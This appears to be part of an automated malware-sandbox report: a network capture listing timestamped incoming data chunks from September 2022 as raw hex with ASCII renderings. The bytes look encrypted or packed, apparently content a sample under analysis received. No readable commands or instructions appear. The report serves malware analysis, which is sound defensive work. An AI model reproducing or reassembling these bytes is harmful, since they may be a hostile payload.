                                                          2022-09-11 08:16:26 UTC569INData Raw: 24 52 60 e8 e0 f8 96 02 de d5 78 28 85 d5 78 34 64 76 8b 91 93 b6 3d 80 80 10 a8 9a 74 15 62 08 2c b1 18 ac 10 39 2c bd 14 ac 10 39 2c b5 1c ac 10 e6 f3 79 c5 b9 10 11 74 66 90 8e 71 c5 b9 10 11 69 60 9a 92 10 ef 28 74 db c1 b9 10 b1 d9 c1 b9 10 9b a6 29 84 80 10 78 d8 1c ac 10 40 af 2a ee f8 4a cd 60 30 1b 8b 0e 8b 01 00 f6 f3 79 c5 b9 10 11 74 66 90 8e 71 c5 b9 10 11 69 60 9a 92 10 ef 28 74 db c1 b9 10 9b 86 75 c1 b9 10 78 a4 60 ac 10 41 ae 2a 5e 53 5d 5e d4 8b d2 57 01 00 f6 f3 79 c5 b9 10 11 74 66 90 8e 71 c5 b9 10 11 69 60 9a 92 10 ef 28 74 db c1 b9 10 9b 9e 6d c1 b9 10 78 cc 08 ac 10 42 ad 2a 5e 63 6d 68 e2 8b a6 23 01 00 b8 f9 50 04 04 10 04 c5 6c ac 10 11 04 b9 10 ac 10 11 04 c1 68 ac 10 78 d4 10 ac 10 f8 b3 a5 01 00 7c 47 c0 81 45 cf 8b 72 f6 00
                                                          Data Ascii: $R`x(x4dv=tb,9,9,ytfqi`(t)x@*J`0ytfqi`(tux`A*^S]^Wytfqi`(tmxB*^cmh#Plhx|GEr
                                                          2022-09-11 08:16:26 UTC570INData Raw: ad 10 1f 81 7a 0a 01 00 00 f2 0d ad ad 10 29 04 41 cc b0 10 65 70 ed da 37 05 00 39 44 6d 65 0e 93 28 ce 0e 00 e8 68 86 06 00 e8 88 74 14 00 eb 81 e9 7b fa 77 2c b1 ad 43 06 00 68 7c 16 02 00 6a 6b e9 23 c0 0b 00 8b 7b cb cc ae 00 56 8b 2d 57 01 00 a9 a9 ca 39 ac a0 10 ef ca b9 3c b0 10 f8 47 aa 05 00 59 a6 2f 55 45 b4 63 40 01 be 9c 72 06 00 59 00 a6 ea 1d 88 80 10 93 cd 4a fb 76 8f ed f3 4e be 53 b1 0a 00 59 b0 84 93 01 00 7c 7b fb 76 72 50 bf 55 b5 08 00 59 6a f3 80 1f 01 05 92 0b ce 0c 6a 66 64 f8 02 92 10 f8 36 cb 15 00 8b 72 72 79 79 d6 55 3b f3 80 c9 cc a1 61 73 83 79 35 2c 15 ad ad 10 1f 8b 41 c5 00 00 83 e6 99 fc 3b cb 84 71 86 7d fc 77 5b 8f 89 a9 81 10 95 45 b4 7c 5f 01 05 ac 2f 59 cc a1 67 fe 99 e4 0f 8b 12 96 00 00 57 01 05 bb 26 33 02 00 76
                                                          Data Ascii: z)Aep79Dme(ht{w,Ch|jk#{V-W9<GY/UEc@rYJvNSY|{vrPUYjjfd6rryyU;asy5,A;q}w[E|_/YgW&3v
                                                          2022-09-11 08:16:26 UTC572INData Raw: 47 c8 cf 95 be 41 a9 00 00 8b 7b a6 be da 2c 1e 00 56 be a5 50 1d 00 56 be db 24 17 00 56 be df 2a 1d 00 56 be cf 3a 1d 00 56 be ff 0c 1b 00 56 be 9d 7a 0f 00 56 be 12 e0 1a 00 68 2d 5e 1b 10 f8 e2 0a 00 00 83 47 e0 87 ab a8 a0 10 4e 9d 95 a9 ca 25 b0 a0 10 9b be 09 bc 80 10 ef 29 53 45 b4 55 80 ad ac a0 10 93 7b 07 8b 63 47 af ca 25 b0 a0 10 ef 29 29 2f 55 45 b4 7c 83 0b 78 f9 01 00 eb f0 73 08 e1 81 10 ef ea 21 b4 80 10 95 45 b4 6e 72 38 d1 81 10 40 af ea 11 84 80 10 95 45 b4 7e f5 8b 50 2c f7 2f 59 cd 60 2c 83 cf 60 2c 56 9d a9 6a e8 7e 69 00 00 a6 9a 95 a9 ca 25 b0 a0 10 9b be 09 bc 80 10 ef 29 53 45 b4 55 80 ad ac a0 10 93 7b 07 8b 63 47 af ca 25 b0 a0 10 ef 29 29 2f 55 45 b4 7c 83 0b 7c fd 01 00 eb f0 73 08 e1 81 10 ef ea 21 b4 80 10 95 45 b4 6e 72
                                                          Data Ascii: GA{,VPV$V*V:VVzVh-^GN%)SEU{cG%))/UE|xs!Enr8@E~P,/Y`,`,Vj~i%)SEU{cG%))/UE||s!Enr
                                                          2022-09-11 08:16:26 UTC573INData Raw: 05 00 00 ca a5 20 b0 10 b3 2f 3c b0 10 f8 0c 1e 05 00 7c 47 d4 b3 33 20 b0 10 f8 d9 21 10 00 85 45 b4 11 0d 57 21 1e 10 ef ca b1 34 b0 10 f8 c7 d4 04 00 a6 a6 2f 53 7b 07 5c af ac a0 10 64 3c 20 7c 16 02 00 6a 6b e9 fc 15 01 00 8b 7b 75 73 af 00 2d 40 62 a9 ca 39 ac a0 10 ef ca b9 3c b0 10 f8 14 06 05 00 a6 a6 2f 55 45 b4 6f 71 6a 56 be 28 3b 04 00 a6 00 a6 ea 1d 88 80 10 93 cd 4a fb 76 8f 35 f3 80 ab ec ef 83 90 04 00 cc f3 9e 01 9c a9 66 64 70 8b 93 10 f8 d7 34 0b 00 8b fe 7d 8d 73 82 01 f6 be 95 11 b9 10 13 76 36 29 6e ec f9 00 11 00 59 da e6 99 fc 56 be 5d 97 22 00 59 d0 cc a1 61 45 b4 7d 5f 06 b8 39 f3 22 00 59 00 9e 82 b9 02 01 00 00 17 e3 0b 00 00 83 fe 99 e4 75 42 c8 8a 7d e3 e1 60 6e ec 17 f0 0f 00 59 9a 95 3c 6a ff ca 91 15 b1 10 ef ea 05 90 80
                                                          Data Ascii: /<|G3 !EW!4/S{\d< |jk{us-@b9</UEoqjV(;Jv5fdp4}sv6)nYV]"YaE}_9"YuB}`nY<j
                                                          2022-09-11 08:16:26 UTC574INData Raw: 0f b1 de 67 bd da c6 5d 43 60 f3 f9 7c 4d 5e df 8e 8c 79 79 de 59 cb c6 00 01 00 00 74 7d 82 d6 55 8b c6 4d 0c 8d 9a 9a cc b9 7c be 1c 57 65 23 f3 f9 7c b9 4f 91 2d 9b 54 86 cf cc b9 17 d7 c3 f8 82 57 a6 7c 82 8c 8e 8a 40 cb dc 59 86 94 11 b9 75 93 16 ae e7 21 2e 00 85 45 99 2d 67 ec f8 84 fe 71 0c 74 7e 81 c6 41 86 8c f9 ba 49 84 89 47 c2 5f 50 de 59 87 c6 5d 64 46 b1 fe 81 fc 75 dc 29 7b db 54 71 85 7b f2 7c ea 1a 57 a6 70 c2 84 bd ff 83 e6 99 fc 80 be 3e 0f 8b 6d e9 00 00 8a 8c 3a 1c 54 70 38 35 7c 73 40 ad 18 bd a5 08 63 be 3e 0f 8b 54 d0 00 00 83 fe 75 08 74 7d 82 ce 4d 8b c6 4d 0c 8d 99 ef fe 32 e8 98 70 fa 22 e9 44 07 c1 be 62 28 8d 79 be 1c 57 53 d0 37 c0 74 6a 9c fe 81 fc 74 78 81 cb 47 81 b8 1a 57 71 8f 7b 1b e6 3e f3 f3 e8 e2 7c b9 f3 9b 54 49
                                                          Data Ascii: g]C`|M^yyYt}UM|We#|O-TW|@Yu!.E-gqt~AIG_PY]dFu){Tq{|Wp>m:Tp85|s@c>Tut}MM2p"Db(yWS7tjtxGWq{>|TI
                                                          2022-09-11 08:16:26 UTC576INData Raw: 7b f1 8a 79 f3 ea 3d a8 80 10 f9 12 fb 00 00 83 78 fe 70 79 8f e3 68 08 33 f3 80 a9 03 ea 00 00 83 78 fa 0e 8b 5a de 00 00 8b c5 2e e9 c4 b5 73 c6 41 85 c7 2e eb c3 4c 87 7a f1 07 8a 3d b8 00 00 8b 86 b5 18 a0 10 9b b6 81 1c a0 10 9b 5a d2 fa c2 ec aa 59 4f a2 c5 87 f5 22 df e7 5d 31 08 8b b6 85 18 a0 10 9b 96 a1 1c a0 10 52 41 dc 5c 42 cd 37 e8 af 9e 69 d6 a1 77 8b 3d b3 8e 00 c0 4b f5 1a 11 7c ce 81 22 e7 83 00 00 eb b5 63 ad 90 00 c0 b5 7c ce 81 22 e5 81 00 00 eb a5 73 ac 91 00 c0 b5 7c ce 81 22 e0 84 00 00 eb d5 03 ae 93 00 c0 b5 7c ce 81 22 e1 85 00 00 eb c5 13 b0 8d 00 c0 b5 7c ce 81 22 e6 82 00 00 eb f5 23 b2 8f 00 c0 b5 7c ce 81 22 e2 86 00 00 eb e5 33 af 92 00 c0 b5 72 c0 81 22 ee 8a 00 00 ff 89 12 0e 62 f7 2c 8a d0 f7 1a 8f ec 84 e3 68 08 51 ae
                                                          Data Ascii: {y=xpyh3xZ.sA.Lz=ZYO"]1RA\B7iw=K|"c|"s|"|"|"#|"3r"b,hQ
                                                          2022-09-11 08:16:26 UTC577INData Raw: aa ea bd 28 80 10 4d 02 01 05 02 9a a9 69 eb dc 1f 2b 00 83 7b f9 58 2d 61 7f 69 eb cf 0c 2b 00 85 45 99 2c 6a 9c be 2d bd ad 10 11 74 63 7e 94 fc 00 00 e8 dc ca 01 00 97 97 ff 00 00 e8 c2 d4 01 00 a6 00 9a 95 01 64 c5 49 7f 74 b4 10 93 bf c9 71 25 a1 10 11 74 6b 93 89 f1 75 21 a1 10 99 b1 50 c8 af 0f 00 ff cf b3 44 df f0 42 ad 07 00 85 45 99 00 2d 78 4a c5 7d da 58 ae e1 f3 80 1f 01 9d 40 a7 d1 75 21 a1 10 10 33 f3 2b 1a a2 d8 96 6d f0 80 10 46 e8 3e 21 a1 10 47 dc b5 bb 7a 8b 67 90 fd 7a 05 75 79 5a a8 2c 84 bf 3e 39 10 00 7c a5 26 59 da 45 ce 89 7f 5e 02 a2 10 6c a0 62 3e 21 a1 10 4f d4 8d 83 45 b4 7d 8a fd 7a 05 74 76 53 af 2c 50 45 ce 89 7f 5e 02 a2 10 6c 9a b8 05 98 96 de 67 67 ce 4d f7 cb f1 45 21 a1 10 ef ea b9 2c 80 10 4d 9e a9 66 64 30 cb 93 10
                                                          Data Ascii: (Mi+{X-ai+E,j-tc~dItq%tku!PDBE-xJ}X@u!3+mF>!GzgzuyZ,>9|&YE^lb>!OE}ztvS,PE^lggME!,Mfd0
                                                          2022-09-11 08:16:26 UTC578INData Raw: 00 dc 45 b4 5f a0 cb 64 e5 29 f7 e8 27 53 63 e1 c6 82 b9 02 01 00 00 14 cb ab ce a9 67 8b 8b 8b 33 fa f4 38 05 00 c0 cf 9b 55 4a 4a 02 48 ee 8d 2f 82 b9 02 01 00 00 cc f3 28 68 76 09 00 3c a9 62 60 d0 2b 93 10 f8 c6 d8 09 00 17 50 5f 18 00 74 cb 38 fd 45 b4 62 95 e6 99 fc ff 2f 3b ec 34 f3 80 83 48 ee 8d 2f 82 b9 02 01 00 00 17 1d d3 26 00 e8 af b1 09 00 3c ab 36 68 36 10 f8 f8 f5 1a 00 a6 fa b7 a2 b6 10 d3 48 cf 60 20 a7 bb ae b6 10 b3 bf aa b6 10 b3 83 96 b6 10 b3 87 92 b6 10 d3 48 cf 60 20 8f 86 c9 64 a0 10 46 6f 69 54 70 64 9b 7a 9a 9d fa 0f 77 50 2c 8b 43 cc 37 fd b4 99 80 a2 c5 0f 4f 68 2c 56 65 fa b2 76 3c 69 54 70 76 31 f3 03 3c ca 15 96 b6 10 f8 f5 f8 1a 00 a6 9a a9 4a 48 b0 4b 93 10 f8 62 7f 0a 00 cc cc 76 f4 99 6d f4 a5 53 d6 55 8b 78 f0 74 33
                                                          Data Ascii: E_d)'Scg38UJJH/(hv<b`+P_t8Eb/;4H/&<6h6H` H` dFoiTpdzwP,C7Oh,Vev<iTpv1<JHKbvmSUxt3
                                                          2022-09-11 08:16:26 UTC580INData Raw: 45 b4 77 53 af 28 54 40 d3 5d 38 ad 53 0d 52 d4 00 00 05 b1 b4 00 00 50 af 28 88 01 03 06 98 95 dd ff 50 2c 8d 73 82 0b 2c 06 02 dc b6 65 d8 80 10 46 a9 28 5c 0d 36 b0 00 00 85 45 b4 77 53 af 28 5c 0d 3e b8 00 00 85 45 b4 77 53 af 28 5c 0d 32 b4 00 00 85 45 b4 77 53 af 28 5c 0d 46 c0 00 00 85 45 b4 77 53 af 28 bd 6c 8b d3 0e 0d dc fa 83 b8 e4 a4 10 64 7d 82 88 86 45 b4 77 53 af 28 54 f8 87 fc 74 7e 81 c8 47 81 45 b4 77 53 af 28 54 40 d3 5d 38 ad 53 0d 52 d4 00 00 05 b1 b4 00 00 50 af 28 88 02 06 d0 4d 98 9d 46 7a 8b 43 b2 45 b4 47 65 dd bb 0b cc 83 5c 7f de b1 d0 3f 29 01 00 7a 73 af 2d 6f 4d be ba ad 00 00 7c bd 3e 59 2c 7a 8e 7f b6 ec a4 10 64 73 51 be 90 85 02 00 a6 d2 4c 99 9d f0 f3 03 a9 66 64 70 8c 94 10 f8 c3 db 0f 00 17 5d 54 1e 00 74 7b 51 f5 ff
                                                          Data Ascii: EwS(T@]8SRP(P,s,eF(\6EwS(\>EwS(\2EwS(\FEwS(ld}EwS(Tt~GEwS(T@]8SRP(MFzCEGe\?)zs-oM|>Y,zdsQLfdp]Tt{Q
                                                          2022-09-11 08:16:26 UTC581INData Raw: f0 00 00 72 99 66 c8 ad b8 07 a8 ea a9 3c 80 10 95 45 cf 8b ad 28 01 00 68 69 00 01 00 8d ce 5f 4a 06 b8 80 73 1b 00 33 e1 90 c1 47 c8 35 6c bd 61 f2 7f 8d fa 7f 03 89 7e f8 00 00 80 fd 93 ee 0f 8b 4b cf 00 00 8d f8 9a 65 84 8a 4d c6 8b 46 c2 00 00 0f b9 f0 b9 f0 b9 7f 20 4f a6 00 00 68 69 00 01 00 8d ce 5f 4a 06 b8 c9 3a 1b 00 8b c6 a9 67 47 c8 67 a2 f9 b9 fc 95 6d 3c c1 d9 a9 10 99 fc 91 0f c1 a0 cc 47 85 44 b4 5c 27 b9 88 31 b9 76 2b f9 99 ce a5 6a 0a dc f5 a9 10 18 4c 7f 26 12 b9 f0 47 46 7c c3 8e 9c 61 f6 75 4e 00 c6 be 3e 75 a4 5a fe 91 1b ba a5 63 45 ce 8b fe 9d e4 8d fc 91 96 9b 62 4c 4e f2 7f c3 84 4b 09 01 00 00 e8 c7 d4 04 00 95 6c 8f ca 4f 81 ce 53 9d 04 ed cd a9 10 4a 3c ed ba 70 27 ef b9 71 01 00 0a 3f 86 78 78 1b 78 6b 04 00 16 0c 1b 01 00
                                                          Data Ascii: rf<E(hi_Js3G5la~KeMF Ohi_J:gGgm<GD\'1v+jL&GF|auN>uZcEbLNKlOSJ<p'q?xxxk
                                                          2022-09-11 08:16:26 UTC582INData Raw: bb 00 00 80 0b 41 19 38 66 c9 fc fc 4d 11 f3 c2 a9 fd 72 0f 75 65 9d c7 aa 5b bb 00 00 80 53 38 60 c6 45 01 50 5d 89 c7 aa 5a ba 00 00 80 53 39 67 09 3c 7c c4 00 00 09 19 9b ce b9 75 8f 8f cd 74 cc 77 ce b5 0f f7 07 8a 76 f3 00 00 a1 25 32 b6 10 95 45 cf 8b 5c d8 00 00 8b 86 91 25 b9 10 9b be a1 14 80 10 78 68 40 40 00 c1 20 ee 0c 4b 44 b7 bb 80 80 00 53 02 ae 29 5d 86 91 25 b9 10 b1 25 32 b6 10 aa ba 00 00 80 53 39 e3 59 58 a9 25 32 b6 10 9b cb 50 9b 86 91 25 b9 10 93 27 2c 4c c4 00 00 00 a1 25 32 b6 10 9b cb 50 ee b6 0b e2 25 32 b6 10 9b c3 58 90 f9 3a 43 75 7c 8a e3 64 fa 5f 25 32 b6 10 93 fb 70 f7 8a 10 36 39 6a ff 8f 7c f3 29 77 25 32 b6 10 ef 8f 60 7a 6a ff ca 91 15 b1 10 ef ea 05 90 80 10 9b 86 85 31 b9 10 b1 25 32 b6 10 7b a2 dd 9f 9e 99 35 b9 10
                                                          Data Ascii: A8fMrue[S8`EP]ZS9g<|utwv%2E\%xh@@ KDS)]%%2S9YX%2P%',L%2P%2X:Cu|d_%2p69j|)w%2`zj1%2{5
                                                          2022-09-11 08:16:26 UTC584INData Raw: f2 7d 8d c2 43 81 f2 7f 8d d0 5d 8f c0 4f 8d d0 51 83 c0 4f 3f 70 43 7d 22 dd c6 4a 02 8c c5 42 f1 3f 42 7d de a8 c4 4a 02 77 6f 9c fd 72 0f 75 7b 85 45 71 bf 00 00 80 53 3c 64 c6 45 01 30 b4 c9 d4 d4 cf 45 25 cb a0 fd 72 0f 75 65 9d c3 ae 5f bf 00 00 80 53 3c 64 c6 45 01 70 7d 89 09 14 54 c4 00 00 8d c3 ae 5a ba 00 00 80 53 39 e3 19 9b ce 55 99 8a 8a cd 5c e4 cf f3 80 1f 01 05 92 0a 96 de 67 6f 6f f8 b5 29 31 b9 10 9b c6 45 63 ab d4 17 06 89 35 b9 10 93 42 d6 94 62 11 79 c4 bd 31 38 fd 57 1a ca 7a d9 76 01 2a 76 88 4d 31 2c 3d 6d ce b5 07 14 e6 8e 42 21 63 49 35 cc c5 25 39 63 dc ad 73 86 99 2d b9 10 9b 52 32 fa 9a d8 57 8f b0 18 76 ad db dd f5 dc a2 7f 89 40 d7 2f e3 51 d4 55 7a 9a d3 e3 ad 0a f4 96 91 35 b9 10 fb fa 9a d8 57 8f b0 18 76 ad db dd f5 dc
                                                          Data Ascii: }C]OQO?pC}"JB?B}Jworu{EqS<dE0E%rue_S<dEp}TZS9U\goo)1Ec5Bby18Wzv*vM1,=mB!cI5%9cs-R2Wv@/QUz5Wv
                                                          2022-09-11 08:16:26 UTC585INData Raw: 55 2b fc c8 8b d4 af 00 00 38 c7 0c 0c 00 00 e9 ac ba 00 00 cc cc 74 fe 79 66 6e ec 45 4d 1f 00 a6 9a f8 e4 aa 78 86 ce 55 2b fc b3 72 c1 c7 0c 0c 00 00 8b 48 2b 2f 1c 24 00 3c a9 7a 78 d0 2c 94 10 f8 9d ae 24 00 74 d6 55 8d 5e ae 7b f1 8a 79 e4 ec fa 01 00 a6 b0 25 cd 01 00 8b fe 79 89 73 83 79 5f bb e0 d8 2f 00 a6 b0 5e b6 01 00 83 be 95 11 b9 10 13 0c 8a 16 92 01 00 33 cc 76 f4 99 67 7d 1e ef 88 0d 8b 01 00 6a 6e ec fc f5 1e 00 a6 d0 f4 81 af bb 51 4b 0d 00 a6 d0 cc a5 db fc c8 8b 1a 9e 00 00 3b 0e a5 29 b9 10 67 3e 1f 05 03 b8 7a 65 08 00 7c 47 c8 89 45 b4 71 8c d4 b9 0f de 63 be b7 a5 05 00 a6 d0 cc a1 df fc b3 53 ac c8 bf b4 73 fd b4 70 89 4d 96 03 ac 8a 91 0c 27 cd 02 00 53 bb 81 9b 0d 00 76 cc a5 b3 03 b8 62 78 0d 00 7c 47 dc 21 44 99 91 3d 73 cc
                                                          Data Ascii: U+8tyfnEMxU+rH+/$<zx,$tU^{y%ysy_/^3vg}jnQK;)g>ze|GEqcSspM'Svbx|G!D=s
                                                          2022-09-11 08:16:26 UTC586INData Raw: 56 01 96 0a 4e c4 49 8a 8c 8e 8f 8d cc 47 89 cf 46 8b cc 44 8a cf 45 89 ce 4d 56 01 96 0a 53 1d f9 45 cd 71 f1 45 c5 0b 30 c4 03 00 00 75 51 e5 28 eb 81 61 e1 80 7a f1 7a 7f f0 0e 56 59 03 db b1 35 f7 57 10 9b 74 08 2e 26 db a9 dd 07 57 10 9d c4 49 8b 4c 7d b9 03 00 00 83 7a fd 76 7e 8f 63 e3 28 e3 37 db a1 21 f2 56 10 ef db a9 2d f7 57 10 80 24 e2 56 10 c8 8e 56 10 10 57 57 10 9a cc 45 20 f2 59 cf 44 80 6d ef c0 28 eb 81 6c ee 82 7a f1 7a c0 4f 0e 56 59 03 db b1 35 f7 57 10 9d c4 49 8a cc 45 20 f2 59 cf 44 89 cc 44 c3 28 eb 8a cf 45 81 6d ec 81 6c ed 81 7a f1 7a fa 75 0e 56 59 03 db b1 35 f7 57 10 80 1a cc 45 20 f2 59 cf 44 89 cc 44 8a cf 45 88 cc 47 c0 28 eb 8a cf 46 82 6d ed 80 6c ec 80 7a f1 07 8d d4 a9 00 00 02 0e 56 59 03 db b1 35 f7 57 10 9d c4 49
                                                          Data Ascii: VNIGFDEMVSEqE0uQ(azzVY5Wt.&WIL}zv~c(7!V-W$VVWWE YDm(lzzOVY5WIE YDD(EmlzzuVY5WE YDDEG(FmlzVY5WI
                                                          2022-09-11 08:16:26 UTC588INData Raw: b9 63 00 00 00 00 bb f7 c7 27 00 7c 47 d0 9f 4d 2d 3e ec 64 49 61 71 8c 96 f5 21 41 de 45 2b e8 a6 71 8c 96 f5 3a 52 fe 69 eb 74 4d b3 7a 85 80 82 80 48 02 78 f1 bf 6a 51 3a 86 18 f2 93 80 82 80 48 02 78 f1 bf 7c 47 3b 71 fa b2 59 61 9b d7 64 49 61 77 8a 90 23 c0 8e fe 08 fe 69 eb 8a 7a 84 ce 49 66 3a d8 d4 5a f9 a7 b1 91 87 00 00 77 96 f6 fb cb 27 00 95 48 7b d0 81 83 7a 1a 69 09 c7 68 20 52 65 c5 cd f5 b2 62 9d 7a fb 7c 72 8f 7a fa 76 61 b5 ad a1 ad 10 4e 9d 62 ad a1 ad 10 99 84 01 a1 ad 10 4e 9d 2b 34 0b 28 00 a9 00 00 00 00 91 c7 16 16 00 00 e8 85 ba 28 00 7c 47 d0 97 4b 37 a1 9d 0f 00 00 00 00 00 00 00 00 00 00 00 00 47 df 70 28 87 c7 68 20 81 57 a6 1d 5a f3 4a ce 60 2c 8c 44 b5 63 97 7b fa 01 01 00 72 7c 8d be b9 3d b9 10 10 74 71 ec 3f c7 11 00 57
                                                          Data Ascii: c'|GM->dIaq!AE+q:RitMzHxjQ:Hx|G;qYadIaw#izIf:Zw'H{zih Rebz|rzvaNbN+4((|GK7Gp(h WZJ`,Dc{r|=tq?W
                                                          2022-09-11 08:16:26 UTC589INData Raw: a3 3f 00 a6 07 9d 0f 00 00 99 de 67 ba 65 f3 90 00 00 00 00 00 00 00 db de 59 81 c4 49 8a 88 08 ca b4 7d 8a 41 c3 0e a4 af 20 cf 1a 7a fe 7d 8b 4a 36 72 c4 49 83 42 c0 8b 8c 0c ca b4 7d 8a 45 c7 0e ac a7 20 57 9d 65 4a 42 47 e4 7e 97 0a 0f 00 00 00 00 00 00 00 00 00 47 df 70 20 8f c7 68 2c ff 35 c1 03 00 00 75 49 b7 89 38 3b 74 5b 24 ca b4 52 1c 5b 60 74 50 2f ee 90 69 dc 29 f8 2a 7b 43 77 6c 13 ca b4 65 2b 5b 62 76 65 93 42 c5 87 41 c6 0e ee 91 a7 59 74 cc f3 03 53 8b db 11 31 63 43 c1 c2 34 35 c3 01 00 00 74 6c 92 88 81 41 c3 3b 3b 74 92 64 42 c0 0b ca b4 a8 2b 35 c0 02 00 00 74 d0 c2 ed 89 81 41 c0 38 3b 74 bb c4 ca b4 b2 fc 5b 60 74 b0 cf ee 90 c9 3e 42 c3 e9 63 dd de 67 bd 00 f0 a1 a0 a0 10 23 f6 4c cc b9 5d 01 16 b6 10 43 05 65 e8 e0 f8 94 dc 72 8c
                                                          Data Ascii: ?geYI}A z}J6rIB}E WeJBG~Gp h,5uI8;t[$R[`tP/i)*{Cwle+[bveBAYtS1cC45tlA;;tdB+5tA8;t[`t>Bcg#L]Cer
                                                          2022-09-11 08:16:26 UTC590INData Raw: 16 00 c4 f8 9a 2d 7d ce c7 dd 00 dd 00 83 43 c8 83 7b 1b e9 31 c5 cd c8 87 35 be 8a 8d ae 01 a8 8a 81 0b 8a 79 f3 8a 7d f7 ea f9 6c 80 10 95 45 b4 56 1b 64 41 4f 00 26 71 57 00 b8 ed f9 8a 69 e3 8a 6d e7 8a 8d ae 05 ac 8a 55 df ea 91 04 80 10 99 cc bd ae be bc ac 07 00 a6 a6 8a 81 1c a3 b3 07 00 74 ce bd a1 b0 b0 58 01 00 39 64 55 81 d4 a9 7d d4 ad 85 7d 83 8d 8d cb 54 9d cc 4d 31 64 7d 55 7d 83 8d 8d cb 44 8d cc 65 df 8a 7d e0 2c cd 09 00 83 7b 07 a6 d0 cc a9 99 72 34 f3 29 c8 20 01 00 3b 7e 65 2f 8b 5f db 00 00 53 00 de c0 59 45 ae 8a 65 40 af 8a 55 c8 08 e9 09 00 83 47 dc 23 f8 4a cc b1 80 a0 5f be dd 68 80 10 43 00 ac 8a 61 44 af 8a 79 f3 8a 7d f7 29 ed f8 4a cc bd 8d 72 34 c5 1f 5e b7 00 00 7e 43 be 7b 18 97 4f bb 43 c8 35 3d 04 04 00 77 61 fe 0c ec
                                                          Data Ascii: -}C{15y}lEVdAO&qWimUtX9dU}}TM1d}U}De},{r4) ;~e/_SYEe@UG#J_hCaDy})Jr4^~C{OC5=wa
                                                          2022-09-11 08:16:26 UTC592INData Raw: 0a 4e c4 49 8a cc 45 8b cf 44 89 cc 44 8a cf 45 89 ce 4d 56 01 96 0a 53 1a cc 45 8b cf 44 89 cc 44 8a cf 45 88 cc 47 89 cf 46 8a ce 4d 56 01 96 0a 96 de 67 6f 6f e4 81 f4 81 75 fc 8d 73 fe 79 87 f6 75 83 c6 5d d1 28 ee ec ed 8b 16 9b 00 00 00 66 69 60 69 60 69 60 21 5e 76 69 60 39 76 46 69 60 31 6e 56 69 70 78 61 69 70 30 5f 76 69 70 28 77 46 69 70 20 6f 56 69 60 09 26 26 69 60 01 3e 36 69 60 19 16 06 69 60 11 0e 16 69 70 18 27 26 69 70 10 3f 36 69 70 08 17 06 69 70 00 0f fd 3b 36 80 00 00 8d 32 3f 80 00 00 49 3c d6 28 fe 8d 73 f6 81 77 6e b8 9e 96 de 67 6f 6f f0 95 f4 89 7d fc 8d 71 d4 a1 77 d6 51 87 48 5a 12 43 43 ce 4d 3b f9 e1 e1 49 62 ee 3c f9 e1 e1 53 12 73 cb c9 d1 d1 79 64 e8 3c c9 d1 d1 71 5a da dc a2 3f c1 fe 65 9b 45 4d 62 9e f6 c4 a5 d3 ca 85
                                                          Data Ascii: NIEDDEMVSEDDEGFMVgoousyu](fi`i`i`!^vi`9vFi`1nVipxaip0_vip(wFip oVi`&&i`>6i`i`ip'&ip?6ipip;62?I<(swngoo}qwQHZCCM;Ib<Ssyd<qZ?eEMb
                                                          2022-09-11 08:16:26 UTC593INData Raw: 9b c6 55 91 cc 9d 53 ce 51 47 da cc 95 5b 8b 56 df cc 99 57 ce 4d 5f 64 cc c4 7e 49 85 c4 81 45 f4 9d 69 f4 a9 db 8b db 5e 01 00 8b be 89 3c 80 10 9d c0 a5 b9 01 af 29 53 45 4b 96 c5 58 80 10 64 2a dd fe 95 e9 74 2d d5 c8 ad b8 af 8a 79 f3 29 53 45 b4 3f c8 fe 95 e9 74 30 ce fe a9 5f 7d 01 38 82 91 d5 01 00 00 75 79 f3 8a ad 30 59 53 1d 00 74 7b a9 1f 7d cc 89 25 da 7f 0e 0f 00 80 08 24 de c9 72 3e 35 3d 04 04 00 77 58 c7 49 5f 01 00 74 4f ff fc b3 4c ff c7 cc 00 cc 00 eb c6 7a 00 a8 8a a9 23 8a ad b2 6b fe 8a 7d f7 2c 58 7b cb cc 82 b6 f0 f3 29 38 d1 00 00 50 b8 1f 2a 22 00 c4 fc 9e 2d 7d ce c7 dd 00 dd 00 83 43 c8 81 cc a1 0f e8 8a f4 99 dd 44 99 90 ac 55 89 32 66 07 a8 8a 91 0c 11 13 15 00 7c 47 c8 5a a9 8a 91 1b 8a a9 23 8a ad b2 6b fe 8a 7d f7 2c 56
                                                          Data Ascii: USQG[VWM_d~IEi^<)SEKXd*t-y)SE?t0_}8uy0YSt{}%$r>5=wXI_tOLz#k},X{)8P*"-}CDU2f|GZ#k},V
                                                          2022-09-11 08:16:26 UTC594INData Raw: cb b5 5d a3 c7 68 34 9b cf 60 28 3f e1 25 06 7a 53 53 cf 60 2c ff 06 7a 7b 7b 48 34 93 40 34 9b 43 43 4d 31 93 40 34 13 d2 3a ac cc 43 43 d7 78 34 9b df 70 28 87 cf 60 2c d9 38 38 0a 0a 3b 3b 09 d3 c2 bc 81 03 04 78 7b 07 93 40 30 9f 43 43 cf 60 34 e7 11 e5 d2 a3 7c 35 6f 70 28 7b 7f 7a 7d 34 7f 60 2c 7e 7f 47 65 6f 60 34 0b 4f 70 30 27 e8 f0 6f 60 2c 13 4f 70 28 fb 2d 2d 2f 5b 59 da 8b 41 41 58 58 52 52 43 43 4d 98 9c d2 10 cc 00 00 00 00 00 00 00 00 00 00 47 cf 60 2c 83 c7 68 34 1b c3 43 c7 68 28 79 7c 82 cf 60 20 f3 16 23 d2 10 53 a4 16 6a 53 53 cf 60 2c ff 93 40 30 17 db 53 cf 60 2c ff 16 e2 d0 88 99 d2 10 cc 00 00 00 00 00 00 00 00 00 00 00 41 cf bd a4 98 4e 29 80 24 00 00 00 8d e9 40 24 33 f3 4a ce 60 2c 5b d8 53 19 21 e8 83 df 70 2c ff 35 c1 03 00
                                                          Data Ascii: ]h4`(?%zSS`,z{{H4@4CCM1@4:CCx4p(`,88;;x{@0CC`4|5op({z}4`,~Geo`4Op0'o`,Op(--/[YAAXXRRCCMG`,h4Ch(y|` #SjSS`,@0S`,AN)$@$3J`,[S!p,5
